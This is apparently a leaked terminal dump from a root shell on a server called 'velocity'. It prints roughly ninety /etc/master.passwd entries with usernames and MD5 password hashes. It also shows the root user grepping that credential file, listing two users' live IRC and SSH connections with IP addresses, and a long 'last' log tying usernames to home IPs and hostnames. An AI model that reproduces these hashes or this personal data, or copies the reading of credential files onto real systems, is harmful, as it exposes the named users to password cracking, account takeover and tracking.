omelette:*LOCKED*$1$XN1bbL.7$oThuyRVmG09RvI02.4C1I0:1222:1222::0:0:User &:/home/omelette:/usr/local/bin/bash
mimik0r:$1$0XSPv6Su$ZwaXxxlJYHS97/pdN0oy90:1223:1223::0:0:User &:/home/mimik0r:/usr/local/bin/bash
owine:$1$wxGmMtzO$Z3thy5JIjzaffvKpPG9WI/:1224:1224::0:0:User &:/home/owine:/usr/local/bin/bash
manboo:$1$N2gCSmE3$yk.dcCPMq6Y1/ezAac7wu0:1225:1225::0:0:User &:/home/manboo:/usr/local/bin/bash
corley:$1$PvKjpEEr$Vo37apBxJ3eqZqB8OLfaT.:1231:1231::0:0:User &:/home/corley:/usr/local/bin/bash
sqd:$1$OZvYdPVR$FmfB6RtJAzTp1oGmdMCCp1:1233:1233::0:0:User &:/home/sqd:/usr/local/bin/bash
mooo:$1$zEP5oqSf$UbHTr1.JzIn0ey0.DAGn21:1234:1234::0:0:User &:/home/mooo:/usr/local/bin/bash
comedy:$1$z6LpAT1A$nc1/vuEvWdaP/cLqkowCs.:1235:1235::0:0:User &:/home/comedy:/usr/local/bin/bash
lynx:$1$se6yc6Bo$.LQ7e0Q01u3rYovysJR3h1:1236:1236::0:0:User &:/home/lynx:/usr/local/bin/bash
prodigy:$1$RVyb9n7n$.xCux6MDqOIdqJ0st2KOb1:1237:1237::0:0:User &:/home/prodigy:/usr/local/bin/bash
chrirc:$1$2JCsvlHc$i/CQOaTf5gEpM7oFCjDN/.:1238:1238::0:0:User &:/home/chrirc:/usr/local/bin/bash
lyhne1:$1$Kpsj2jtT$sjUGo/h4J2FIkuoqishrw/:1242:1242::0:0:User &:/home/lyhne1:/usr/local/bin/bash
percott1:$1$BjzcMqbu$i3/MQucqGMtCREAcP7W65.:1243:1243::0:0:User &:/home/percott1:/usr/local/bin/bash
djspark:$1$c6xQdKTb$mWggScCvJZiwkdnzpx/Cp/:1244:1244::0:0:User &:/home/djspark:/usr/local/bin/bash
ac1115:$1$XsglBGxw$DyTzTnNO0mOsflnamAukf0:1246:1246::0:0:User &:/home/ac1115:/usr/local/bin/bash
asriel:$1$VbcBqSUx$JEQvA2lwRWPqk.0w11oes/:1247:1247::0:0:User &:/home/asriel:/usr/local/bin/bash
devil:$1$q6WNzUIk$/Qv4J3E.fbG/JE4j.hHAL/:1248:1248::0:0:User &:/home/devil:/usr/local/bin/bash
lymelyte:$1$nqTvcQub$visWqXp3cKGDkwc25KYNl0:1249:1249::0:0:User &:/home/lymelyte:/usr/local/bin/bash
cmm:$1$ekGdXp0j$hUyJVyP3UXWhCOHVtCq/N1:1250:1250::0:0:User &:/home/cmm:/usr/local/bin/bash
nek0o:$1$PUmJEvpa$ZrIV7QV6Qf3GJn5cEOTIu0:1252:1252::0:0:User &:/home/nek0o:/usr/local/bin/bash
baxxta:$1$apBmnTij$hZw5VnHaUpHlSuOIYNfD20:1253:1253::0:0:User &:/home/baxxta:/usr/local/bin/bash
bruhaha:$1$HH2GgFl4$cmXD/bE438EiLmIbJyqdR1:1254:1254::0:0:User &:/home/bruhaha:/usr/local/bin/bash
dv327:$1$MDTcfoUl$154clLyjNZI4qgtQzyrDq/:1258:1258::0:0:User &:/home/dv327:/usr/local/bin/bash
voxitize:$1$DWOR6B.M$ppBHJaNOS4LvRrOhbphX2/:1261:1261::0:0:User &:/home/voxitize:/usr/local/bin/bash
own3d:$1$kCOJh8SJ$KwEe1bJ8e.JS3Nm.xwYb10:1262:1262::0:0:User &:/home/own3d:/usr/local/bin/bash
feed:$1$RHeHyv6H$v1cnIn1fKUwC9k.got3dl.:1264:1264::0:0:User &:/home/feed:/usr/local/bin/bash
yaquis:$1$68F1SID1$b9H5Bbj/fNYsvUhqgpr9Q1:1266:1266::0:0:User &:/home/yaquis:/usr/local/bin/bash
bpunux:$1$SqaNE5JP$bp1vJn3I4Rr6oZ6eJAmvz0:1269:1269::0:0:User &:/home/bpunux:/usr/local/bin/bash
skypilot:$1$0iDevIYV$Oi53AE7YFrB6AaBnAfcn7.:1271:1271::0:0:User &:/home/skypilot:/usr/local/bin/bash
blake96:$1$KwitdaYi$2EyIIukI8gEIxZCHwwj4U.:1272:1272::0:0:User &:/home/blake96:/usr/local/bin/bash
blotch:$1$rYr2mFcV$HPpQFgQacg4ScPjvNfYR31:1274:1274::0:0:User &:/home/blotch:/usr/local/bin/bash
scouse:$1$du5wftbl$lVamWsT/nEKT75D/IelEI/:1275:1275::0:0:User &:/home/scouse:/usr/local/bin/bash
mogle3:$1$Fo7FY4Sw$ioqHiMhZ/8BBDZjg39BR41:1276:1276::0:0:User &:/home/mogle3:/usr/local/bin/bash
ste:$1$H4hxohFI$se6RPLcCpkl/LY4aUiov6.:1277:1277::0:0:User &:/home/ste:/usr/local/bin/bash
omgwtf:$1$eK9d4q9r$eCZMCR.GRqmt6oOhrbam11:1281:1281::0:0:User &:/home/omgwtf:/usr/local/bin/bash
brosb4:$1$NQd5q63M$62LY3LnPxuPbrBmTANOkm1:1283:1283::0:0:User &:/home/brosb4:/usr/local/bin/bash
mindben:$1$xrm2x1nF$DnA.Wkg4q9ImdLOA75IT00:1284:1284::0:0:User &:/home/mindben:/usr/local/bin/bash
hixk:$1$p2dRk8OC$XpC/2o0jwotue0Tmbdr3R0:1286:1286::0:0:User &:/home/hixk:/usr/local/bin/bash
omen:$1$eT86NXcE$.ouer9/Fp/lv04NAhli5a1:1287:1287::0:0:User &:/home/omen:/usr/local/bin/bash
sakik1:$1$PujiBsEC$Syl3nyJzAObvu2UcpfbVd/:1290:1290::0:0:User &:/home/sakik1:/usr/local/bin/bash
chriys:$1$R0.IBcw2$VILPHOKDvQts2eyy6ndoK0:1291:1291::0:0:User &:/home/chriys:/usr/local/bin/bash
jtracy:$1$RxPgmSPJ$/O7J8PYHUMZHIx/4hJ0XE0:1292:1292::0:0:User &:/home/jtracy:/usr/local/bin/bash
roodyk:$1$0Bo4ZY89$ray17Ga4HpE2QtaFiHOg11:1293:1293::0:0:User &:/home/roodyk:/usr/local/bin/bash
qfx:$1$miBfwHok$ODKoxjFkZSYxfQqzQX96A1:1295:1295::0:0:User &:/home/qfx:/usr/local/bin/bash
chrisdad:$1$hurRNkwG$V8PUznOwFheCuU6TCWic4.:1296:1296::0:0:User &:/home/chrisdad:/usr/local/bin/bash
rice21:$1$nB9dgK9c$XmTcPL/ig7xDxT1iIbY4..:1298:1298::0:0:User &:/home/rice21:/usr/local/bin/bash
wchan21:$1$Ia3.DKEB$oTtcBvRdagIb59HbVfc3l0:1299:1299::0:0:User &:/home/wchan21:/usr/local/bin/bash
xkelsx:$1$iWNCktLQ$F37FwcA8XlJuiSk0RqB1p1:1300:1300::0:0:User &:/home/xkelsx:/usr/local/bin/bash
jerryste:$1$lUhhapJy$Hi6dQ4ToW6xAPMjfK5bBS1:1302:1302::0:0:User &:/home/jerryste:/usr/local/bin/bash
pbx:$1$Ln.hfEBz$k/Q1E0leCS9T.gLaPPpBA.:1303:1303::0:0:User &:/home/pbx:/usr/local/bin/bash
mlh:$1$9kndvAsu$/kIT6xRBCsb8nf8.m0kPV.:1307:1307::0:0:User &:/home/mlh:/usr/local/bin/bash
howell1:$1$Vtbi5SB.$w6W4pZ/Pc/TfPA0y0jod4/:1308:1308::0:0:User &:/home/howell1:/usr/local/bin/bash
djkarl:$1$aEJTRbAG$3eWTZQ4CgwGbHbAfHHl4P.:1309:1309::0:0:User &:/home/djkarl:/usr/local/bin/bash
subkult:$1$2QPeEVKb$bCL0KYncuAGfIO4FKWW3N1:1310:1310::0:0:User &:/home/subkult:/usr/local/bin/bash
dealer:$1$mITFxoNU$lJtxGqUo2K4rE6/PYLYCg/:1311:1311::0:0:User &:/home/dealer:/bin/sh
cont:$1$Hl1DCBfm$HO43dbNlGn6TZvo/F2zTH0:1312:1312::0:0:User &:/home/cont:/usr/local/bin/bash
ircusr:$1$X1181Xd3$524I5czvIWxCkduxRuKhk1:1313:1313::0:0:User &:/home/ircusr:/usr/local/bin/bash
lordy:$1$y5CwHmRO$PZRJ/aY7BtMqY9FagatZR1:1314:1314::0:0:User &:/home/lordy:/usr/local/bin/bash
chozen1:$1$qc4UoXsN$U/YTbetNKaZ/RwEYpWOdP1:1315:1315::0:0:User &:/home/chozen1:/usr/local/bin/bash
nardi:$1$ttRgdp5X$kq1Gb/4FPSmGdbiYBEwt1/:1316:1316::0:0:User &:/home/nardi:/usr/local/bin/bash
ssaws:*LOCKED*$1$.qT8FvGI$l60rRjSoGgG699wR51Ie/0:1317:1317::0:0:User &:/home/ssaws:/usr/local/bin/bash
chaos1:$1$hgGtAmCk$BzvUVeU8f38CKZPr4CcZ/1:1318:1318::0:0:User &:/home/chaos1:/usr/local/bin/bash
jax66:$1$4TWJjUIH$Pm/erJRmRgc01FCVakDfB.:1319:1319::0:0:User &:/home/jax66:/usr/local/bin/bash
paleride:$1$ahPjbJV5$g63Rwng/2D9rKeK0bIwdx.:1320:1320::0:0:User &:/home/paleride:/usr/local/bin/bash
kokoryu:$1$NVQwZzru$VjR4eW9CGrT.YF6nh72Ke0:1321:1321::0:0:User &:/home/kokoryu:/usr/local/bin/bash
bluewish:$1$rQtdB28x$5bGykkOQ8gr5lx1qHYlRs1:1322:1322::0:0:User &:/home/bluewish:/usr/local/bin/bash
grumpy:$1$o.biiCj3$5AG9SpDJjbNUSSnnJ92uc.:1323:1323::0:0:User &:/home/grumpy:/usr/local/bin/bash
jaiven:$1$y.IDqqL3$u7netp1tGxbhjKfbd6XTO0:1324:1324::0:0:jusam69:/home/jaiven:/usr/local/bin/bash
rikt:$1$Fjry.jO8$9hNprEmsN9GLULLeZvb.o1:1325:1325::0:0:User &:/home/rikt:/usr/local/bin/bash
sal:$1$AuSJnmDL$YSdEP0KfVzRRVCiyhnnhj.:1326:1326::0:0:User &:/home/sal:/usr/local/bin/bash
lailoke:$1$EC6X0Zz.$DdVRj0ju8ua4DKMFCAFUo/:1327:1327::0:0:User &:/home/lailoke:/usr/local/bin/bash
kingzy:$1$qm46wwsJ$QNk/qT5dDS2bXr87qZpMi0:1328:1328::0:0:User &:/home/kingzy:/usr/local/bin/bash
delion1:$1$awK8R.nN$0GCL5dcuK1cirjfudAqHY0:1329:1329::0:0:User &:/home/delion1:/usr/local/bin/bash
vietnigh:$1$FdwjedVt$tmUPUlfiHYr/bTUivlFn01:1330:1330::0:0:User &:/home/vietnigh:/usr/local/bin/bash
darkuno3:$1$L9VYcl3k$mIQ9ahiFi0Sy0Oc8re8TM0:1331:1331::0:0:User &:/home/darkuno3:/usr/local/bin/bash
mae21:$1$aVUu0DTg$jvYomCsK1cewfLWHurOlv0:1332:1332::0:0:User &:/home/mae21:/usr/local/bin/bash
redrum:$1$WFOWXv8b$Rqxxha5.d8WjszhU0AKXC.:1333:1333::0:0:User &:/home/redrum:/usr/local/bin/bash
cpu:$1$tjEDjNz1$e6.aktoZ6oizYft1eyXMp.:1334:1334::0:0:User &:/home/cpu:/usr/local/bin/bash
cassand:$1$hZgXLQbv$uE7b8oM88z9qjqhFwka7X/:1335:1335::0:0:User &:/home/cassand:/usr/local/bin/bash
nyakz:$1$yGPbLpHT$cIcqvBVPmI6fjG9cilKu7/:1336:1336::0:0:User &:/home/nyakz:/usr/local/bin/bash
ioplex:$1$FSJ1qmmR$zFt5TGcDNeAQOcWCiWQZq0:1337:1337::0:0:User &:/home/ioplex:/usr/local/bin/bash
dasboot:$1$PgS728fU$IfecoKOgPjuVFep1GIesx.:1338:1338::0:0:User &:/home/dasboot:/usr/local/bin/bash
visage:$1$jGAd8QtY$Fi4fFEemJYjj0/gu9oDDc1:1339:1339::0:0:User &:/home/visage:/usr/local/bin/bash
brosco:$1$kpHOwub.$2odvLK5iEXASTkwbcuilY0:1340:1340::0:0:User &:/home/brosco:/usr/local/bin/bash
mrts:$1$f8026tqY$cxdY57bGxA11PdflJBaET/:1341:1341::0:0:User &:/home/mrts:/usr/local/bin/bash
qberto:$1$qprEj3J4$VzXPUlgGqiKKlZIml3M8y/:1342:1342::0:0:User &:/home/qberto:/usr/local/bin/bash
kooner:$1$Kl19GSGx$ZjpFwBynWbIT40iEkCfxg/:1343:1343::0:0:User &:/home/kooner:/usr/local/bin/bash
matt:$1$Mj6LerXV$SnwLvGTJI5hQbZLi7ho96/:1344:1344::0:0:User &:/home/matt:/usr/local/bin/bash
alexbb:$1$6LLUjutX$OiYpyvVAi60xC2sFVA4OP0:1345:1345::0:0:User &:/home/alexbb:/usr/local/bin/bash
psycoz:$1$UgwFHV0f$4/V6NqEuYTJL2GwpfwjYb.:1346:1346::0:0:User &:/home/psycoz:/usr/local/bin/bash
brex132:$1$lhno75FQ$L5fsLgcdEObDqCp55rkQn/:1347:1347::0:0:User &:/home/brex132:/usr/local/bin/bash
romeo:$1$ekIx6D6b$coKlSvt01Xe8jfDaK7e5A1:1348:1348::0:0:User &:/home/romeo:/usr/local/bin/bash
pimpinjg:$1$6gpJ9Bk3$/lYnWkgoGwYBXOIR4ff581:1349:1349::0:0:pimp:/home/pimpinjg:/usr/local/bin/bash
[root@velocity:/var/run]#
[root@velocity:/]# cat /etc/master.passwd | grep romeo
romeo:$1$ekIx6D6b$coKlSvt01Xe8jfDaK7e5A1:1348:1348::0:0:User &:/home/romeo:/usr/local/bin/bash
[root@velocity:/]# cat /etc/master.passwd | grep pimpinjg
pimpinjg:$1$6gpJ9Bk3$/lYnWkgoGwYBXOIR4ff581:1349:1349::0:0:pimp:/home/pimpinjg:/usr/local/bin/bash
[root@velocity:/]# lsof -i -n | grep romeo
irssi 32525 romeo 3u IPv4 0xcc67d000 0t0 TCP 72.20.28.205:53881->71.6.199.68:ircd (ESTABLISHED)
irssi 32525 romeo 4u IPv4 0xc9254740 0t0 TCP 72.20.28.205:53882->66.225.223.70:ircd (ESTABLISHED)
irssi 32525 romeo 5u IPv4 0xc9c76cb0 0t0 TCP 72.20.28.205:53883->94.102.58.212:ircd (ESTABLISHED)
irssi 32525 romeo 20u IPv4 0xc5bf1ae0 0t0 TCP 72.20.28.205:54464->67.203.77.67:ircd (ESTABLISHED)
sshd 83595 romeo 3u IPv4 0xc58a23a0 0t0 TCP 72.20.28.248:ssh->188.50.41.73:56764 (ESTABLISHED)
[root@velocity:/]# lsof -i -n | grep pimpinjg
sshd 82325 pimpinjg 3u IPv4 0xc5480000 0t0 TCP 72.20.28.248:ssh->76.175.20.182:55028 (ESTABLISHED)
[root@velocity:~]# last
katsst ttyp2 adsl-76-240-177- Tue Jun 23 18:34 - 19:04 (00:30)
katsst ttyp2 adsl-76-240-177- Tue Jun 23 18:13 - 18:33 (00:20)
katsst ttyp2 adsl-76-240-177- Tue Jun 23 17:13 - 17:43 (00:30)
pimpinjg ttypf cpe-76-175-20-18 Tue Jun 23 08:51 - 08:51 (00:00)
pimpinjg ttypd cpe-76-175-20-18 Tue Jun 23 08:47 still logged in
pimpinjg ttypf cpe-76-175-20-18 Tue Jun 23 08:37 - 08:42 (00:05)
pimpinjg ttypd cpe-76-175-20-18 Tue Jun 23 08:37 - 08:43 (00:06)
pimpinjg ttypd cpe-76-175-20-18 Tue Jun 23 08:36 - 08:36 (00:00)
pimpinjg ttypd cpe-76-175-20-18 Tue Jun 23 08:36 - 08:36 (00:00)
pimpinjg ttypf cpe-76-175-20-18 Tue Jun 23 07:19 - 08:32 (01:12)
pimpinjg ttypd cpe-76-175-20-18 Tue Jun 23 07:15 - 08:36 (01:20)
pimpinjg ttypd cpe-76-175-20-18 Tue Jun 23 07:12 - 07:13 (00:01)
pimpinjg ttypd cpe-76-175-20-18 Tue Jun 23 07:11 - 07:12 (00:00)
pimpinjg ttypf cpe-76-175-20-18 Tue Jun 23 05:20 - 05:20 (00:00)
pimpinjg ttypd cpe-76-175-20-18 Tue Jun 23 04:59 - 07:10 (02:10)
pimpinjg ttypd cpe-76-175-20-18 Tue Jun 23 03:43 - 04:25 (00:42)
pimpinjg ttypd cpe-76-175-20-18 Tue Jun 23 03:10 - 03:10 (00:00)
pimpinjg ttypd cpe-76-175-20-18 Tue Jun 23 02:52 - 02:59 (00:07)
pimpinjg ttypd cpe-76-175-20-18 Tue Jun 23 02:37 - 02:38 (00:01)
pimpinjg ttypf cpe-76-175-20-18 Tue Jun 23 01:26 - 01:28 (00:01)
pimpinjg ttypf cpe-76-175-20-18 Tue Jun 23 01:16 - 01:17 (00:01)
pimpinjg ttypd cpe-76-175-20-18 Tue Jun 23 01:15 - 01:43 (00:28)
pimpinjg ttypf cpe-76-175-20-18 Tue Jun 23 01:11 - 01:14 (00:02)
pimpinjg ttypf cpe-76-175-20-18 Tue Jun 23 01:02 - 01:07 (00:04)
pimpinjg ttypd cpe-76-175-20-18 Tue Jun 23 00:45 - 01:14 (00:28)
alexbb ttypd 53551eb9.cable.c Tue Jun 23 00:29 - 00:29 (00:00)
katsst ttypf cpe-75-84-149-5. Mon Jun 22 23:35 - 00:05 (00:30)
katsst ttypd cpe-75-84-149-5. Mon Jun 22 23:15 - 23:35 (00:19)
pimpinjg ttypd cpe-76-175-20-18 Mon Jun 22 21:14 - 22:05 (00:50)
pimpinjg ttypd cpe-76-175-20-18 Mon Jun 22 21:07 - 21:14 (00:07)
pimpinjg ttypd cpe-76-175-20-18 Mon Jun 22 19:23 - 19:54 (00:31)
pimpinjg ttypd cpe-76-175-20-18 Mon Jun 22 18:36 - 18:36 (00:00)
blkgraz ttypf cpe-66-25-54-163 Mon Jun 22 17:41 - 23:35 (05:53)
pimpinjg ttypd cpe-76-175-20-18 Mon Jun 22 17:40 - 18:24 (00:43)
pimpinjg ttypd cpe-76-175-20-18 Mon Jun 22 17:12 - 17:37 (00:24)
pimpinjg ttypd cpe-76-175-20-18 Mon Jun 22 09:20 - 09:21 (00:01)
pimpinjg ttype cpe-76-175-20-18 Mon Jun 22 08:45 - 09:19 (00:33)
pimpinjg ttype cpe-76-175-20-18 Mon Jun 22 08:37 - 08:40 (00:02)
pimpinjg ttypd cpe-76-175-20-18 Mon Jun 22 08:30 - 08:49 (00:19)
pimpinjg ttypd cpe-76-175-20-18 Mon Jun 22 08:20 - 08:26 (00:05)
pimpinjg ttypd cpe-76-175-20-18 Mon Jun 22 08:17 - 08:18 (00:01)
pimpinjg ttype cpe-76-175-20-18 Mon Jun 22 08:03 - 08:12 (00:08)
pimpinjg ttypd cpe-76-175-20-18 Mon Jun 22 08:01 - 08:03 (00:02)
pimpinjg ttypd cpe-76-175-20-18 Mon Jun 22 07:55 - 08:00 (00:04)
pimpinjg ttypd cpe-76-175-20-18 Mon Jun 22 07:43 - 07:55 (00:11)
pimpinjg ttypd cpe-76-175-20-18 Mon Jun 22 04:09 - 04:12 (00:03)
pimpinjg ttypf cpe-76-175-20-18 Mon Jun 22 03:05 - 03:06 (00:00)
katsst ttypd cpe-75-84-149-5. Mon Jun 22 02:44 - 03:14 (00:30)
pimpinjg ttypd cpe-76-175-20-18 Mon Jun 22 02:31 - 02:33 (00:01)
katsst ttypg cpe-75-84-149-5. Mon Jun 22 00:20 - 00:50 (00:30)
hts ttypf pool-71-114-161- Mon Jun 22 00:15 - 00:49 (00:33)
smash ttypd c-98-232-250-179 Sun Jun 21 22:54 - 01:28 (02:34)
chaos1 ttypd c-69-143-254-180 Sun Jun 21 22:06 - 22:09 (00:03)
pimpinjg ttypd cpe-76-175-20-18 Sun Jun 21 20:58 - 21:48 (00:50)
pimpinjg ttypd cpe-76-175-20-18 Sun Jun 21 20:35 - 20:51 (00:16)
pimpinjg ttypd cpe-76-175-20-18 Sun Jun 21 20:07 - 20:23 (00:16)
pimpinjg ttypd cpe-76-175-20-18 Sun Jun 21 19:51 - 19:53 (00:01)
pimpinjg ttypd cpe-76-175-20-18 Sun Jun 21 17:22 - 17:25 (00:03)
pimpinjg ttypd cpe-76-175-20-18 Sun Jun 21 17:02 - 17:08 (00:06)
apo ttypd d75-152-200-195. Sun Jun 21 15:03 - 15:26 (00:22)
apo ttypd d75-152-200-195. Sun Jun 21 15:03 - 15:03 (00:00)
kokoryu ftp 82-45-111-232.c Sun Jun 21 13:43 - 13:54 (00:10)
cazz1961 ttypd 5ad95c74.bb.sky. Sun Jun 21 06:09 - 06:40 (00:30)
ste ttype doc-24-32-94-198 Sat Jun 20 20:50 - 21:21 (00:30)
matt ttypd 71.81.144.135 Sat Jun 20 19:27 - 20:00 (00:32)
matt ftp 71.81.144.135 Sat Jun 20 19:24 - 19:30 (00:06)
matt ttypd 71.81.144.135 Sat Jun 20 18:09 - 18:46 (00:36)
matt ftp 71.81.144.135 Sat Jun 20 17:19 - 17:24 (00:05)
matt ttypd 71.81.144.135 Sat Jun 20 17:06 - 17:56 (00:50)
matt ftp 71.81.144.135 Sat Jun 20 17:04 - 17:09 (00:05)
matt ftp 71.81.144.135 Sat Jun 20 16:56 - 17:02 (00:05)
yaquis ttypd ip72-223-92-235. Sat Jun 20 16:35 - 17:05 (00:30)
pimpinjg ttypd cpe-76-175-20-18 Sat Jun 20 15:18 - 15:29 (00:10)
brosco ftp 99-19-91-167.li Sat Jun 20 14:22 - 14:23 (00:01)
brosco ftp 99-19-91-167.li Sat Jun 20 14:17 - 14:22 (00:04)
brosco ftp 99-19-91-167.li Sat Jun 20 14:12 - 14:16 (00:04)
brosco ftp 99-19-91-167.li Sat Jun 20 14:06 - 14:11 (00:04)
brosco ftp 99-19-91-167.li Sat Jun 20 14:01 - 14:06 (00:04)
brosco ftp 99-19-91-167.li Sat Jun 20 13:56 - 14:01 (00:04)
brosco ftp 99-19-91-167.li Sat Jun 20 13:51 - 13:56 (00:04)
brosco ftp 99-19-91-167.li Sat Jun 20 13:46 - 13:50 (00:04)
brosco ftp 99-19-91-167.li Sat Jun 20 13:40 - 13:45 (00:04)
brosco ftp 99-19-91-167.li Sat Jun 20 13:35 - 13:40 (00:04)
brosco ftp 99-19-91-167.li Sat Jun 20 13:30 - 13:35 (00:04)
brosco ftp 99-19-91-167.li Sat Jun 20 13:25 - 13:30 (00:04)
brosco ftp 99-19-91-167.li Sat Jun 20 13:20 - 13:25 (00:04)
brosco ftp 99-19-91-167.li Sat Jun 20 13:15 - 13:19 (00:04)
brosco ftp 99-19-91-167.li Sat Jun 20 13:09 - 13:14 (00:04)
brosco ftp 99-19-91-167.li Sat Jun 20 13:04 - 13:09 (00:04)
brosco ftp 99-19-91-167.li Sat Jun 20 12:59 - 13:04 (00:04)
brosco ftp 99-19-91-167.li Sat Jun 20 12:54 - 12:59 (00:04)
brosco ftp 99-19-91-167.li Sat Jun 20 12:49 - 12:54 (00:04)
brosco ftp 99-19-91-167.li Sat Jun 20 12:44 - 12:48 (00:04)
brosco ftp 99-19-91-167.li Sat Jun 20 12:38 - 12:43 (00:04)
brosco ftp 99-19-91-167.li Sat Jun 20 12:33 - 12:38 (00:04)
brosco ftp 99-19-91-167.li Sat Jun 20 12:28 - 12:33 (00:04)
brosco ftp 99-19-91-167.li Sat Jun 20 12:23 - 12:28 (00:04)
brosco ftp 99-19-91-167.li Sat Jun 20 12:18 - 12:23 (00:04)
brosco ftp 99-19-91-167.li Sat Jun 20 12:13 - 12:17 (00:04)
brosco ftp 99-19-91-167.li Sat Jun 20 12:07 - 12:12 (00:04)
brosco ftp 99-19-91-167.li Sat Jun 20 12:02 - 12:07 (00:04)
brosco ftp 99-19-91-167.li Sat Jun 20 11:57 - 12:02 (00:04)
brosco ftp 99-19-91-167.li Sat Jun 20 11:52 - 11:57 (00:04)
brosco ftp 99-19-91-167.li Sat Jun 20 11:47 - 11:51 (00:04)
brosco ftp 99-19-91-167.li Sat Jun 20 11:41 - 11:46 (00:04)
brosco ftp 99-19-91-167.li Sat Jun 20 11:36 - 11:41 (00:04)
brosco ftp 99-19-91-167.li Sat Jun 20 11:31 - 11:36 (00:04)
brosco ftp 99-19-91-167.li Sat Jun 20 11:26 - 11:31 (00:04)
brosco ftp 99-19-91-167.li Sat Jun 20 11:21 - 11:26 (00:04)
brosco ftp 99-19-91-167.li Sat Jun 20 11:16 - 11:20 (00:04)
brosco ftp 99-19-91-167.li Sat Jun 20 11:10 - 11:15 (00:04)
brosco ftp 99-19-91-167.li Sat Jun 20 11:05 - 11:10 (00:04)
brosco ftp 99-19-91-167.li Sat Jun 20 11:00 - 11:05 (00:04)
brosco ftp 99-19-91-167.li Sat Jun 20 10:55 - 11:00 (00:04)
brosco ftp 99-19-91-167.li Sat Jun 20 10:50 - 10:55 (00:04)
brosco ftp 99-19-91-167.li Sat Jun 20 10:45 - 10:49 (00:04)
brosco ftp 99-19-91-167.li Sat Jun 20 10:39 - 10:44 (00:04)
brosco ftp 99-19-91-167.li Sat Jun 20 10:34 - 10:39 (00:04)
brosco ftp 99-19-91-167.li Sat Jun 20 10:29 - 10:34 (00:04)
brosco ftp 99-19-91-167.li Sat Jun 20 10:24 - 10:29 (00:04)
brosco ftp 99-19-91-167.li Sat Jun 20 10:19 - 10:24 (00:04)
brosco ftp 99-19-91-167.li Sat Jun 20 10:14 - 10:18 (00:04)
brosco ftp 99-19-91-167.li Sat Jun 20 10:08 - 10:13 (00:04)
brosco ftp 99-19-91-167.li Sat Jun 20 10:03 - 10:08 (00:04)
brosco ftp 99-19-91-167.li Sat Jun 20 09:58 - 10:03 (00:04)
brosco ftp 99-19-91-167.li Sat Jun 20 09:53 - 09:58 (00:04)
brosco ftp 99-19-91-167.li Sat Jun 20 09:48 - 09:53 (00:04)
brosco ftp 99-19-91-167.li Sat Jun 20 09:43 - 09:47 (00:04)
brosco ftp 99-19-91-167.li Sat Jun 20 09:37 - 09:42 (00:04)
brosco ftp 99-19-91-167.li Sat Jun 20 09:32 - 09:37 (00:04)
brosco ftp 99-19-91-167.li Sat Jun 20 09:27 - 09:32 (00:04)
brosco ftp 99-19-91-167.li Sat Jun 20 09:22 - 09:27 (00:04)
brosco ftp 99-19-91-167.li Sat Jun 20 09:17 - 09:22 (00:04)
brosco ftp 99-19-91-167.li Sat Jun 20 09:12 - 09:16 (00:04)
brosco ftp 99-19-91-167.li Sat Jun 20 09:06 - 09:11 (00:04)
brosco ftp 99-19-91-167.li Sat Jun 20 09:01 - 09:06 (00:04)
brosco ftp 99-19-91-167.li Sat Jun 20 08:56 - 09:01 (00:04)
brosco ftp 99-19-91-167.li Sat Jun 20 08:51 - 08:56 (00:04)
brosco ftp 99-19-91-167.li Sat Jun 20 08:46 - 08:51 (00:04)
brosco ftp 99-19-91-167.li Sat Jun 20 08:41 - 08:45 (00:04)
brosco ftp 99-19-91-167.li Sat Jun 20 08:35 - 08:40 (00:04)
brosco ftp 99-19-91-167.li Sat Jun 20 08:30 - 08:35 (00:04)
brosco ftp 99-19-91-167.li Sat Jun 20 08:25 - 08:30 (00:04)
brosco ftp 99-19-91-167.li Sat Jun 20 08:20 - 08:25 (00:04)
brosco ftp 99-19-91-167.li Sat Jun 20 08:15 - 08:20 (00:04)
brosco ftp 99-19-91-167.li Sat Jun 20 08:10 - 08:14 (00:04)
brosco ftp 99-19-91-167.li Sat Jun 20 08:02 - 08:09 (00:07)
omgwtf ttypd 24-216-119-13.dh Sat Jun 20 04:49 - 04:55 (00:05)
pimpinjg ttypd cpe-76-175-20-18 Sat Jun 20 02:13 - 02:14 (00:00)
kruapra ttypd 75.80.56.213 Sat Jun 20 01:08 - 01:38 (00:30)
yaquis ttypd 186.136.137.30 Fri Jun 19 23:51 - 23:57 (00:05)
yaquis ttypd ip72-223-92-235. Fri Jun 19 22:17 - 22:48 (00:30)
pimpinjg ttypd 76.175.20.182 Fri Jun 19 20:41 - 20:43 (00:01)
psycoz ttypd xdsl-213-196-228 Fri Jun 19 18:53 - 19:10 (00:16)
psycoz ttypd xdsl-213-196-228 Fri Jun 19 18:50 - 18:50 (00:00)
yaquis ttypd 186.136.137.30 Fri Jun 19 18:24 - 18:27 (00:02)
matt ftp 75-130-211-104. Fri Jun 19 17:13 - 17:23 (00:09)
matt ftp 75-130-211-104. Fri Jun 19 16:57 - 17:02 (00:05)
matt ttypd 75-130-211-104.d Fri Jun 19 16:56 - 17:12 (00:16)
matt ftp 75-130-211-104. Fri Jun 19 15:49 - 15:50 (00:00)
matt ttypd 75-130-211-104.d Fri Jun 19 15:44 - 15:50 (00:05)
matt ftp 75-130-211-104. Fri Jun 19 15:43 - 15:49 (00:05)
matt ftp 75-130-211-104. Fri Jun 19 15:18 - 15:36 (00:18)
matt ftp 75-130-211-104. Fri Jun 19 15:10 - 15:16 (00:06)
matt ftp 75-130-211-104. Fri Jun 19 15:02 - 15:08 (00:05)
matt ftp 75-130-211-104. Fri Jun 19 14:55 - 15:00 (00:05)
matt ttypd 75-130-211-104.d Fri Jun 19 14:48 - 15:36 (00:47)
matt ftp 75-130-211-104. Fri Jun 19 14:46 - 14:53 (00:06)
matt ttypd 75-130-211-104.d Fri Jun 19 14:33 - 14:46 (00:12)
matt ftp 75-130-211-104. Fri Jun 19 14:29 - 14:40 (00:10)
matt ttypd 75-130-211-104.d Fri Jun 19 14:18 - 14:33 (00:14)
matt ftp 75-130-211-104. Fri Jun 19 14:17 - 14:25 (00:07)
matt ftp 75-130-211-104. Fri Jun 19 14:14 - 14:15 (00:01)
matt ftp 75-130-211-104. Fri Jun 19 14:06 - 14:11 (00:05)
pimpinjg ttypf cpe-76-175-20-18 Thu Jun 18 22:53 - 22:57 (00:04)
smash ttypd ntora.eml.ee Thu Jun 18 20:44 - 21:12 (00:28)
yaquis ttypd 186.136.137.30 Thu Jun 18 18:21 - 18:29 (00:08)
chaos1 ttypf 94-195-18-213.zo Thu Jun 18 16:34 - 16:41 (00:07)
cpu ttype 63-253-113-213.i Thu Jun 18 15:55 - 18:16 (02:21)
cpu ttypd 63-253-113-213.i Thu Jun 18 14:00 - 18:03 (04:03)
